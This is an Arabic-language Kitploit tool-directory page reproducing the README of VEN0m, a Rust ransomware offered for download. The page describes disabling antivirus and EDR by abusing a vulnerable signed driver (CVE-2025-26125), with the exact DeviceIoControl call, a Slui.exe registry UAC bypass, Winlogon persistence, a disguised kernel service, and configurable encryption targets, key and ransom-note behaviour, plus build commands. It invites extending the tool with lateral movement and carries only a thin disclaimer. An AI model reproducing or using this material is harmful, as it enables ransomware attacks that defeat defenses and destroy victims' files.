Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
VEN0m-Ransomware — برنامج فدية غير قابل للاكتشاف تمامًا ومتجنب، مكتوب بلغة Rust، يستفيد من تقنية BYOVD لتعطيل حلول مكافحة الفيروسات واكتشاف نقطة النهاية (AV/EDR) على الأنظمة المصابة. | Kitploit
أدوات/GitHubGitHub/xm0kht4r/ven0m-ransomware
تصعيد الامتيازاتأدوات التشفير/فك التشفيرآليات الاستمراريةالاستغلالالتهرب من IDS/IPSما بعد الاستغلالتحليل البرمجيات الخبيثةالفريق الأحمرتطوير الحمولات
GitHubxm0kht4r/ven0m-ransomware

VEN0m-Ransomware

برنامج فدية غير قابل للاكتشاف تمامًا ومتجنب، مكتوب بلغة Rust، يستفيد من تقنية BYOVD لتعطيل حلول مكافحة الفيروسات واكتشاف نقطة النهاية (AV/EDR) على الأنظمة المصابة.

367882منذ 6 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

فيروس الفدية VEN0m

https://github.com/user-attachments/assets/5a1fc9b5-a647-41f6-a152-7b9d97381adc

هذا المشروع يوضح كيف يمكن تسليح برنامج تشغيل (driver) شرعي وموقع لتجاوز الدفاعات ونشر فيروس فدية يحاكي هجومًا إلكترونيًا حقيقيًا.

🚨 تم اختباره على Windows 11 Pro 24H2. غير قابل للاكتشاف تمامًا حتى تاريخ الإصدار الأولي: 02-23-2026.

التهربتجاوز UAC
BitDefender✅✅
Kaspersky✅✅
MS Defender✅❌

الميزات الرئيسية

التهرب من مضادات الفيروسات (AV/EDR):

يستخدم VEN0m تقنية BYOVD الكلاسيكية، ولكن على عكس AV-EDR-KILLER الذي يستغل برنامج تشغيل ضعيفًا يكشف دالة النواة ZwTerminateProcess للمستخدمين غير المصرح لهم، فإنه يستغل برنامج تشغيل ضعيفًا مضمنًا في IObit Malware Fighter v12.1.0 وهو أمر مثير للسخرية إلى حد ما لأننا نستخدمه للتهرب.

برنامج التشغيل المعني هو IMFForceDelete.sys، الذي يكشف عن IOCTL يسمح للمستخدمين غير المصرح لهم بحذف الملفات بشكل تعسفي. تم تتبع هذه الثغرة الأمنية باسم CVE-2025-26125، ولا يزال برنامج التشغيل غير مدرج في قائمة الحظر عند Microsoft.

لتفعيل الحذف التعسفي، نقوم ببساطة باستدعاء API DeviceIoControl مع رمز IOCTL 0x8016E000، ومؤشر طويل void إلى سلسلة unicode عريضة تمثل الملف الهدف، والطول الإجمالي مضروبًا في 2 (نظرًا لأن wstr_file.len() يعطي عدد العناصر u16 وكل عنصر بطول 2 بايت) مُحوّل إلى u32 ليتناسب مع معيار استدعاء DWORD الخاص بـ API.

root@kitploit:~
> DeviceIoControl(hDriver, 0x8016E000, wstr_file.as_ptr() as LPVOID, (wstr_file.len() * 2) as u32, ptr::null_mut(), 0, &mut bytes_returned, ptr::null_mut())

[!NOTE]

+ ❓ لماذا فشل AV-EDR-Killer ضد بعض منتجات مضادات الفيروسات (AV/EDR)؟

الفكرة الرئيسية وراءه كانت استغلال برنامج تشغيل يحتوي على IOCTLs غير محمية تكشف دالة النواة ZwTerminateProcess، مما يمنح أي تطبيق في وضع المستخدم قدرات إنهاء على مستوى النواة. ضعف هذه التقنية هو أن بعض منتجات مضادات الفيروسات (AV/EDR) تخطف (hook) الدالة المذكورة ويمكنها اعتراض الاستدعاءات إليها.

تقنية أخرى جديرة بالذكر هي استغلال بدائيات القراءة/الكتابة التعسفية لبرنامج تشغيل ضعيف معين لتصحيح الذاكرة والقفز إلى دالة إنهاء أكثر قوة، PsTerminateProcess، والتي لا يتم تصديرها بواسطة ntoskrnl.exe نفسه. هذا أيضًا مريب جدًا لأن الدفاعات المضيفة تفحص الذاكرة باستمرار. المرجع : https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/

+ ما الجديد؟

نقوم ببساطة بتقطيع مجلدات التثبيت والملفات التنفيذية على القرص. بهذه البساطة!

هذا يبدو كنقطة عمياء لمعظم منتجات الدفاع، حيث أننا نستهدف ملفات على القرص بدلاً من التلاعب بالذاكرة أو إجراء استدعاءات مشبوهة. باستخدام برنامج التشغيل IMFForceDelete.sys الخاص بنا، يمكننا فرض حذف الملفات المقفلة بصلاحيات عالية. مهاجمة منتج مضاد فيروسات (AV) أو كشف نقطة النهاية (EDR) مباشرة يبدو غير بديهي، حيث أن المهاجمين عادةً ما يهدفون إلى التخفي لتجاوز الدفاعات بدلاً من مواجهتها.

باستخدام هذه التقنية، أفسدنا عمليات EDR/AV العاملة حتى توقفت تدريجيًا وتوقفت عن العمل بشكل صحيح، مما فتح الباب لإحداث الفوضى ونشر الحمولة التي نختارها، VEN0m.

  • يمكنك توسيع أو تعديل قائمة مضادات الفيروسات (AV/EDR) المستهدفة عن طريق تعديل الثابت TARGETS:
root@kitploit:~
const TARGETS: &[&str] = &[r"C:\Program Files (x86)\Kaspersky Lab", r"C:\Program Files\Bitdefender", r"C:\Program Files\Bitdefender Agent", r"C:\Program Files\Windows Defender",];

تجاوز UAC:

لتجاوز مطالبات UAC، نقوم باختطاف سير التنفيذ لملف ثنائي موقع من Microsoft Slui.exe يدعم الرفع التلقائي دون إظهار مطالبة عند استدعائه مع الفعل runas في سياق إداري.

يحدث الاستغلال الأساسي عندما يحاول Slui.exe فتح مفتاح تسجيل غير موجود تحت HKCU\Software\Classes\Launcher.SystemSettings\Shell\Open\Command. نستغل هذا العيب عن طريق إنشاء المفتاح المفقود وإدراج DelegateExecute يشير إلى حمولتنا الحالية من أجل تفويض التنفيذ. ثم نقوم بتشغيل Slui.exe باستدعاء API ShellExecuteW مع الفعل runas، مما يؤدي إلى تجاوز ناجح لـ UAC. يمكن العثور على التنفيذ الكامل في /src/uac.rs.

[!IMPORTANT] لست متأكدًا مما إذا كانت هذه ثغرة يجب الإبلاغ عنها. إذا كان الأمر كذلك، فلا تتردد في الاتصال بي عبر البريد الإلكتروني المذكور أدناه.

تحميل برنامج التشغيل:

نظرًا لأن VEN0m يتجاوز UAC ويعمل بصلاحية عالية (High integrity)، فإنه يقوم بأتمتة استخراج برنامج التشغيل المضمن إلى مجلد temp وإنشاء خدمة نواة بأسماء متخفية مثل MicrosoftUpdate11.01. يتضمن فحوصات مفيدة جدًا لبدء الخدمة تلقائيًا إذا تم إيقافها أو الامتناع عن إنشائها إذا كانت موجودة بالفعل.

الثبات:

بعد تحييد دفاعات المضيف، يمكنك اختيار أي تقنية ثبات تريدها. اخترت تقنية Winlogon Userinit البسيطة، والتي تستغل مفتاح التسجيل Userinit تحت HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. بشكل افتراضي، يحدد هذا المفتاح userinit.exe كقيمة، والتي يتم تنفيذها عند تسجيل دخول المستخدم لتهيئة بيئة المستخدم. ومع ذلك، نختطف ذلك بإلحاق مسار حمولتنا أيضًا مفصولاً بفاصلة عن userinit.exe الشرعي، مع إسقاط نسخة من البرنامج الضار في %LOCALAPPDATA%.

التشفير:

يقوم فيروس الفدية بمسح الأقراص المحددة بحثًا عن ملفات ذات امتدادات مستهدفة مع التصفية ضد قائمة الاستثناءات. يتم تشفير الملفات المتطابقة باستخدام مفتاح مشفر بطول 32 بايت، ويتم تغيير امتداداتها إلى .vnm.

يمكنك تخصيص السلوك عن طريق تعديل الثوابت التالية:

  • KEY لتحديد مفتاح التشفير:
root@kitploit:~
const KEY: &[u8; 32] = b"G7m9Xq2vR4pL8bF1sW0cZ6kD3jN5yH8u";
  • XClUSIONS لتحديد الدلائل والمجلدات المستثناة:
root@kitploit:~
const XClUSIONS: &[&str] = &["Windows", "Program Files", "Program Files (x86)", "ProgramData", "$Recycle.Bin", "All Users"];
  • XTENSIONS لتوسيع أو تعديل قائمة الامتدادات المستهدفة:
root@kitploit:~
const XTENSIONS: &[&str] = &["pdf", "doc", "xlms", "png", "jpg", "jpeg", "txt", "mp4"];
  • DRV لتحديد الأقراص المستهدفة:
root@kitploit:~
const DRV: &[&str] = &["C:\\", "D:\\", "E:\\", "F:\\"];

رسالة الفدية:

عند الانتهاء من التشفير، يقوم VEN0m بتغيير خلفية سطح المكتب وإسقاط رسالة فدية قابلة للتنفيذ على سطح المكتب. كما يسجل مهمة مجدولة تعمل كل بضع دقائق لتشغيل واجهة رسالة الفدية، والتي تعرض جمجمة وامضة ☠️.

  • يمكنك تخصيص الخلفية عن طريق استبدال /assets/wallpaper.jpg بصورتك الخاصة.
  • يمكنك تعديل خصائص المهمة المجدولة عن طريق تحرير /src/task.rs

أداة فك التشفير:

يتضمن VEN0m أيضًا أداة فك تشفير Antid0te.exe🧪 تقوم بمسح الملفات ذات الامتداد .vnm وعكس روتين التشفير باستخدام نفس المفتاح المحدد للتشفير.

[!WARNING] من المهم حفظ مفتاح التشفير الخاص بك حتى تتمكن من فك تشفير ملفاتك باستخدام أداة فك التشفير Antid0te.exe.

التخصيص:

VEN0m عالي النمطية وقابل للتخصيص. يمكنك تغيير سلوك فيروس الفدية عن طريق تعديل الثوابت المضمنة. يمكنك أيضًا الارتقاء به إلى المستوى التالي من خلال إقرانه بثغرة تصعيد الصلاحيات أو تقنية تحرك جانبي من اختيارك :)

الاستخدام:

  1. ضع أيقونات .ico الخاصة بك وخلفية سطح المكتب المخصصة داخل /assets
  2. قم بتجميع الملفات الثنائية:
root@kitploit:~
> cargo build --release --bin Note --features 1
> cargo build --release --bin Antid0te --features 2
> cargo build --release --bin VEN0m

🔒 إخلاء المسؤولية

[!CAUTION] أنت مسؤول عن ضمان حصولك على التفويض المناسب قبل استخدام هذه الأداة. المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام.

🤝 التعاون

المساهمات والاقتراحات مرحب بها! إذا كانت لديك استفسارات تجارية "أخلاقية" أو ترغب في التعاون، فلا تتردد في التواصل عبر: [email protected]

مصنوع بـ ❤️، مستوحى من Petya، WannaCry وشركاه.

VEN0m هو قط أسود ضال ألهمني في رحلتي.

تنزيل الأداة